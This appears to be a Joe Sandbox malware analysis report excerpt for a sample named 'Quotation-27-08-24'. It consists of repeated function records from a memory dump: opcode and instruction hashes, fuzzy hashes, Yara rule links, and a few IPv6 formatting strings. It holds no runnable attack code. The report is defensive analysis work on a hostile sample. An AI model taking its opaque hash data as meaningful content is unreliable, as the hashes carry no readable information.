                                          • Opcode ID: 6c48682c35da8efcd0a3d763a083944db239e030c85cc86ce0b7c367edc2ad24
                                          • Instruction ID: 99bbb21418f8141de1205d4e2a5968c4f8e0eff5dbc19b4111754663e9b0f43d
                                          • Opcode Fuzzy Hash: 6c48682c35da8efcd0a3d763a083944db239e030c85cc86ce0b7c367edc2ad24
                                          • Instruction Fuzzy Hash: AF900225221400120245B5594A0454B044D97D6391395C026F14175D0DCA258966AB21
                                          Function 00FA2AD0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 701588877eb0601f5195bf2b8c24780201df00e042f574d284f9c06034e8dcba
                                          • Instruction ID: b37d74ae61a2f7c984fb3f27224f6c6f480d3d8cb8fa27a12eb1f62c49aef4d6
                                          • Opcode Fuzzy Hash: 701588877eb0601f5195bf2b8c24780201df00e042f574d284f9c06034e8dcba
                                          • Instruction Fuzzy Hash: 4F900225211400130205B5594B04547004E87D5391355C032F1016590DDA258962A921
                                          Function 00FA2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09c08339c0aea319e7e84d457985c07cbd20fee08b65845b127c1ccd1bf0aaba
                                          • Instruction ID: a91fca4c26f745f300b56b0bc54597563034b60572f76959023ed80e86b8afdf
                                          • Opcode Fuzzy Hash: 09c08339c0aea319e7e84d457985c07cbd20fee08b65845b127c1ccd1bf0aaba
                                          • Instruction Fuzzy Hash: CC9002A1201540A24600B259C804B4A450D87E0341B55C027E10555A0DC9298952E935
                                          Function 00FA2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a6a4933bb96e093e9cf1a1809ab041c6850a9aa23f4174b4bb66fda8dfc3af1
                                          • Instruction ID: ae4f6a6fb114133f204992a012043de92c70af0ca0be88bed85a3cfc765914d1
                                          • Opcode Fuzzy Hash: 6a6a4933bb96e093e9cf1a1809ab041c6850a9aa23f4174b4bb66fda8dfc3af1
                                          • Instruction Fuzzy Hash: 0490023120140812D2807159880468A000D87D1341F95C026A0026694ECE198B5ABFA1
                                          Function 00FA2BE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18593c4d5deb221a68463330643cdb24155ca8f243daf8f382198b6b77f46abf
                                          • Instruction ID: ca243397622f7c758cee5436fbc37091b415213b23c5648386c126bda509ec49
                                          • Opcode Fuzzy Hash: 18593c4d5deb221a68463330643cdb24155ca8f243daf8f382198b6b77f46abf
                                          • Instruction Fuzzy Hash: 3690023120544852D24071598804A86001D87D0345F55C022A00656D4E9A298E56FE61
                                          Function 00FA2BA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90d4f4fc4bd402a3f43b7c3da29b73eb82aa60c8be77ba1a2353b8bb6950c525
                                          • Instruction ID: 55dcafda70ebe4228e06bd195ad1be0736fef6940097c134cdf528cfe3ea3a7c
                                          • Opcode Fuzzy Hash: 90d4f4fc4bd402a3f43b7c3da29b73eb82aa60c8be77ba1a2353b8bb6950c525
                                          • Instruction Fuzzy Hash: DF90023160540812D25071598814786000D87D0341F55C022A0025694E8B598B56BEA1
                                          Function 00FA2B80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96639b73bb2ec28c332828ffaa7a49e35758fab7fe832f724a31bde186e85f16
                                          • Instruction ID: c7e8ab841b4ba48defd2b76510caab0e77e6aa35aa49d96702affc0bc2c131a4
                                          • Opcode Fuzzy Hash: 96639b73bb2ec28c332828ffaa7a49e35758fab7fe832f724a31bde186e85f16
                                          • Instruction Fuzzy Hash: E590023120140812D20471598C046C6000D87D0341F55C022A6025695F9A698992B931
                                          Function 00FA2CF0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5581fd2b3a222f5e1eba281e31ab91a986b0c311aeec3459b44737b5d2feab32
                                          • Instruction ID: 97e1d2013da9152f1df81b350c631686fbbf8feb0f9f38ce5e9ceb0e1b6a4d5d
                                          • Opcode Fuzzy Hash: 5581fd2b3a222f5e1eba281e31ab91a986b0c311aeec3459b44737b5d2feab32
                                          • Instruction Fuzzy Hash: 4F90023120140413D20071599908747000D87D0341F55D422A0425598EDA5A8952B921
                                          Function 00FA2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c74dff25e8ad925f1ce363e51ab9519aa7e850a17fb609813650338feef4fbf1
                                          • Instruction ID: 5891b1017d33b40f67c713bf04fe6e6b13c2161c455947e52054117448efef1a
                                          • Opcode Fuzzy Hash: c74dff25e8ad925f1ce363e51ab9519aa7e850a17fb609813650338feef4fbf1
                                          • Instruction Fuzzy Hash: C890022160540412D24071599818746001D87D0341F55D022A0025594ECA5D8B56BEA1
                                          Function 00FA2CA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e79b20403b355751dcefb45973a9bdd4ef2584fcd0a4482adf275e383743b667
                                          • Instruction ID: 80caca8221f9f677fefc855d4f389d926cee70ad3fde67d0775ff5c72a43f4db
                                          • Opcode Fuzzy Hash: e79b20403b355751dcefb45973a9bdd4ef2584fcd0a4482adf275e383743b667
                                          • Instruction Fuzzy Hash: D490023120140412D20075999808686000D87E0341F55D022A5025595FCA698992B931
                                          Function 00FA2C60 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89df952e1a29c9a73ede26a11ccb990a47bc0f9d8e895659dc20c25941cc2d3e
                                          • Instruction ID: f0f40ce5f8c4ec1ed3ba551031604253709c338b57959480b9b0800dbd400522
                                          • Opcode Fuzzy Hash: 89df952e1a29c9a73ede26a11ccb990a47bc0f9d8e895659dc20c25941cc2d3e
                                          • Instruction Fuzzy Hash: 9A90023120140852D20071598804B86000D87E0341F55C027A0125694E8A19C952BD21
                                          Function 00FA2DD0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 332601dfb2fc146872e72fcf099ce144c3624101893f80468f45f363244fe5d9
                                          • Instruction ID: 5fe19c7583913f596dc89300420fd56b877135f3529c58684b996f4a77bc3ab2
                                          • Opcode Fuzzy Hash: 332601dfb2fc146872e72fcf099ce144c3624101893f80468f45f363244fe5d9
                                          • Instruction Fuzzy Hash: 2E900221242441625645B1598804547400E97E0381795C023A1415990D892A9957EE21
                                          Function 00FA2DB0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89b74acba0a9b65afd391fdaf38f2c3bb1619b9aeab395ee79a898f0964dea44
                                          • Instruction ID: 11b08c63c3f82a0d16779b6cc7ce46036c88e9dafae5bab7bee2428777aaa467
                                          • Opcode Fuzzy Hash: 89b74acba0a9b65afd391fdaf38f2c3bb1619b9aeab395ee79a898f0964dea44
                                          • Instruction Fuzzy Hash: B590023124140412D24171598804646000D97D0381F95C023A0425594F8A598B57FE61
                                          Function 00FA2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a97d9d900a1cbf1c6377ad48387a1bac1f0f200d101b5fd16632520898d71527
                                          • Instruction ID: 73e4b20276320c7f05b0c421160031cd1ab1214d68379e312b2ce642ca895289
                                          • Opcode Fuzzy Hash: a97d9d900a1cbf1c6377ad48387a1bac1f0f200d101b5fd16632520898d71527
                                          • Instruction Fuzzy Hash: A190022130140013D24071599818646400DD7E1341F55D022E0415594DDD198957AA22
                                          Function 00FA2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 109a1e8761db1e10c8ec2a141f5ccfbd795b865be385832e5e24ad218fab9e38
                                          • Instruction ID: f837ec1cc86b8d2e3589bf3321564e26e0bf6fda600643bb72b6bc4ed5f1a6ab
                                          • Opcode Fuzzy Hash: 109a1e8761db1e10c8ec2a141f5ccfbd795b865be385832e5e24ad218fab9e38
                                          • Instruction Fuzzy Hash: 7B90022921340012D2807159980864A000D87D1342F95D426A0016598DCD19896AAB21
                                          Function 00FA2D00 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86461f585d5d5ca2b8491a00a9f1ee51f9bdabe5892304369e9c114bbb61c827
                                          • Instruction ID: 343316d3778babc2014078e2d6ad79cca53c76bfe897223926d2e755fc541597
                                          • Opcode Fuzzy Hash: 86461f585d5d5ca2b8491a00a9f1ee51f9bdabe5892304369e9c114bbb61c827
                                          • Instruction Fuzzy Hash: DB90022120544452D20075599808A46000D87D0345F55D022A10655D5ECA398952F931
                                          Function 00FA2EE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0410027c1b615086832b66163a122902c1f0c17d6fdaed493bc6a973ca174048
                                          • Instruction ID: 966d73bb5ba36d76330070f37821449b7511220dfabb7aef1ef5fb2046b39245
                                          • Opcode Fuzzy Hash: 0410027c1b615086832b66163a122902c1f0c17d6fdaed493bc6a973ca174048
                                          • Instruction Fuzzy Hash: 7090026120180413D24075598C04647000D87D0342F55C022A2065595F8E2D8D52B935
                                          Function 00FA2EA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8a82d0eaa6a63b0e5eb95f697f655d003105be6e5166c72d3d678cc2a261a6f
                                          • Instruction ID: 9ad8c3458d80543564d95b9e767b6f7f51e4147c63c35160ead749ea85ae80cf
                                          • Opcode Fuzzy Hash: e8a82d0eaa6a63b0e5eb95f697f655d003105be6e5166c72d3d678cc2a261a6f
                                          • Instruction Fuzzy Hash: 2F90027120140412D24071598804786000D87D0341F55C022A5065594F8A5D8ED6BE65
                                          Function 00FA2E80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fd8df498b9999fe6cadef8bc04fd8daaf120351915c790d375d64a9c23a8d90
                                          • Instruction ID: 62ef8e32681a09d7c0984a491bcf424e107876cd2451b0714901998fc3c36661
                                          • Opcode Fuzzy Hash: 2fd8df498b9999fe6cadef8bc04fd8daaf120351915c790d375d64a9c23a8d90
                                          • Instruction Fuzzy Hash: C790022160140512D20171598804656000E87D0381F95C033A1025595FCE298A93F931
                                          Function 00FA2E30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c7957ecc0acb40f5636081356ebde4428d624f663dba70dc4b468e48d7cbffe
                                          • Instruction ID: 0d7f75ad45be9b499b1514e0083b1f219b7ad470c207000f1853693870aebfdc
                                          • Opcode Fuzzy Hash: 0c7957ecc0acb40f5636081356ebde4428d624f663dba70dc4b468e48d7cbffe
                                          • Instruction Fuzzy Hash: 8D90022130140412D20271598814646000DC7D1385F95C023E1425595E8A298A53F932
                                          Function 00FA2FE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f66fdb74c97c212ac053cef237411ea26c9fc936f60f2eb5cd13eb969f5fcc4a
                                          • Instruction ID: a3f5f175dc953f226a751161c0bc6929de810481188910883c29e6d3e6f692bf
                                          • Opcode Fuzzy Hash: f66fdb74c97c212ac053cef237411ea26c9fc936f60f2eb5cd13eb969f5fcc4a
                                          • Instruction Fuzzy Hash: 03900221211C0052D30075698C14B47000D87D0343F55C126A0155594DCD198962AD21
                                          Function 00FA2FB0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 847790d0c64aeec137b49fa71e9ea481c3df5c347489b1fe1814a01f52f003fe
                                          • Instruction ID: 9b3a390038f3b97a0f922e78a8311a8692b3e8ebf25e05a264ba4de482bb5316
                                          • Opcode Fuzzy Hash: 847790d0c64aeec137b49fa71e9ea481c3df5c347489b1fe1814a01f52f003fe
                                          • Instruction Fuzzy Hash: 129002216014005242407169CC44946400DABE1351755C132A0999590E895D8966AE65
                                          Function 00FA2FA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74c31c48933dc7f2d4d7b7e5dcf931657c4ed6a9750ce9406ddf8edac8ac605b
                                          • Instruction ID: 0fb0b2837b44dbeecad21fde48569d0c1e18a655cb8a7f054254cdf80f8bbdba
                                          • Opcode Fuzzy Hash: 74c31c48933dc7f2d4d7b7e5dcf931657c4ed6a9750ce9406ddf8edac8ac605b
                                          • Instruction Fuzzy Hash: 1A90023120180412D20071598C08787000D87D0342F55C022A5165595F8A69C992BD31
                                          Function 00FA2F90 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f60483de2ef7765f4968eb815545a43e4737056ecbce2a1b17faffc6a968f4f
                                          • Instruction ID: 887a1f407d9db5bf11e5e139546073e63f3776fe66696f8aa186f14c332347a2
                                          • Opcode Fuzzy Hash: 5f60483de2ef7765f4968eb815545a43e4737056ecbce2a1b17faffc6a968f4f
                                          • Instruction Fuzzy Hash: F390023120180412D20071598C1474B000D87D0342F55C022A1165595E8A298952BD71
                                          Function 00FA2F60 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8ed814cd5f47c370b2dff9909b3ffce74106b2ae55f279f0408bc76cab82208
                                          • Instruction ID: 657ed43ca1a61185b360c4b11954b8883195dfd9ca8b07feef61e04b9b85620f
                                          • Opcode Fuzzy Hash: d8ed814cd5f47c370b2dff9909b3ffce74106b2ae55f279f0408bc76cab82208
                                          • Instruction Fuzzy Hash: EB90026121140052D20471598804746004D87E1341F55C023A2155594DC92D8D62A925
                                          Function 00FA2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fcf638fdc37dda32021ac48a7fe9d18b0a620b274f9024878eb31d8735f38f2
                                          • Instruction ID: 2bfe9e62c3087893bed50c4e1b9921ad277aac15ca5935519d4a37fbe67f546d
                                          • Opcode Fuzzy Hash: 9fcf638fdc37dda32021ac48a7fe9d18b0a620b274f9024878eb31d8735f38f2
                                          • Instruction Fuzzy Hash: 4490026134140452D20071598814B46000DC7E1341F55C026E1065594E8A1DCD53B926
                                          Function 00FA3090 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b44d84aa35971896dcc5caaaedaa0d5cf28a395e9f6509c3d86ef8773bd2417
                                          • Instruction ID: dab99d41863e824b8857929351f3a086c8f1aee1c34150454f873a749955b41f
                                          • Opcode Fuzzy Hash: 8b44d84aa35971896dcc5caaaedaa0d5cf28a395e9f6509c3d86ef8773bd2417
                                          • Instruction Fuzzy Hash: C390022124140812D2407159C814747000EC7D0741F55C022A0025594E8A1A8A66BEB1
                                          Function 00FA3010 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9df56718bb3b87699dd603e01423889e0ca168bf31341f288e1ba8e10515a1ed
                                          • Instruction ID: 13e0651ee5084a03500c8a45766d1c38e68d41b7bd900d5db81f2d6d24a8fa94
                                          • Opcode Fuzzy Hash: 9df56718bb3b87699dd603e01423889e0ca168bf31341f288e1ba8e10515a1ed
                                          • Instruction Fuzzy Hash: 9590022120184452D24072598C04B4F410D87E1342F95C02AA4157594DCD198956AF21
                                          Function 00FA39B0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9950a85b304c99d4086120290a47a293ec40cb738d4de4aa6aec8e8141940c7f
                                          • Instruction ID: eacca70665be7ddaf4c66e1fdd2d0f99d3463bc20db2d634ae55bb8317d17e6f
                                          • Opcode Fuzzy Hash: 9950a85b304c99d4086120290a47a293ec40cb738d4de4aa6aec8e8141940c7f
                                          • Instruction Fuzzy Hash: E690022124545112D250715D8804656400DA7E0341F55C032A08155D4E89598956BA21
                                          Function 00FA3D70 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d508fe23dc56ba22cd1eec6aeee548c4920f250295287ec6d5552b05d8581367
                                          • Instruction ID: 6109111786066bfce5f6ab32bdc75561c40e1bf3db586d653aa5d1cfadc5be62
                                          • Opcode Fuzzy Hash: d508fe23dc56ba22cd1eec6aeee548c4920f250295287ec6d5552b05d8581367
                                          • Instruction Fuzzy Hash: 6290023520140412D61071599C04686004E87D0341F55D422A0425598E8A5889A2F921
                                          Function 00FA3D10 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb0344c0901473276fecf0361df59da7a17abac55298acff33527740d1de33b3
                                          • Instruction ID: ddcbba6efa10a06a5bfb919e9e09e455ca28bbfa96d5c34e72a73ddc57a95744
                                          • Opcode Fuzzy Hash: fb0344c0901473276fecf0361df59da7a17abac55298acff33527740d1de33b3
                                          • Instruction Fuzzy Hash: 1790023120240152964072599C04A8E410D87E1342B95D426A0016594DCD188962AA21
                                          Function 00FA2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 9602f96c20a6d2849ca0a13a3a99dca8b55b73f4fcdf5f3fab07aaab70d2c151
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Function 00FA2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 8594d3d2a52cefed07596ce85f0401421b78aca9bfac303cd30d770e81d52885
                                          • Instruction ID: 1cd9c4e4cfdb3e88417120171004d16073f327883b2aeacef006c4d481ec5a67
                                          • Opcode Fuzzy Hash: 8594d3d2a52cefed07596ce85f0401421b78aca9bfac303cd30d770e81d52885
                                          • Instruction Fuzzy Hash: 7351E4F2F00116AECB50DB9CC980A7FF7B8BB09740B14822AE465D7641D638DE44BBA1
                                          Function 01012410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
